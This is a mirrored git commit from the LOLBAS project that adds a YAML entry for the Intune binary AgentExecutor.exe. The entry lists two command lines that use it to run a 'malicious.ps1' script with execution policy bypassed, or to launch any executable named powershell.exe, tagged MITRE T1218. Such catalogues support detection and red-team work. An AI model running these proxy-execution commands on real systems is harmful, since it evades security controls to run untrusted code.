mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 06:49:09 +01:00
Merge pull request #77 from leftp/master
Added method for AgentExecutor
This commit is contained in:
commit
a7da0deddd
34
yml/OtherMSBinaries/agentexecutor.yml
Normal file
34
yml/OtherMSBinaries/agentexecutor.yml
Normal file
@ -0,0 +1,34 @@
|
||||
---
|
||||
Name: AgentExecutor.exe
|
||||
Description: Intune Management Extension included on Intune Managed Devices
|
||||
Author: 'Eleftherios Panos'
|
||||
Created: '23/07/2020'
|
||||
Commands:
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
|
||||
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
|
||||
Usecase: Execute unsigned powershell scripts
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||
Usecase: Execute a provided EXE
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link:
|
||||
Acknowledgement:
|
||||
- Person: Eleftherios Panos
|
||||
Handle: @lefterispan
|
||||
---
|
Loading…
Reference in New Issue
Block a user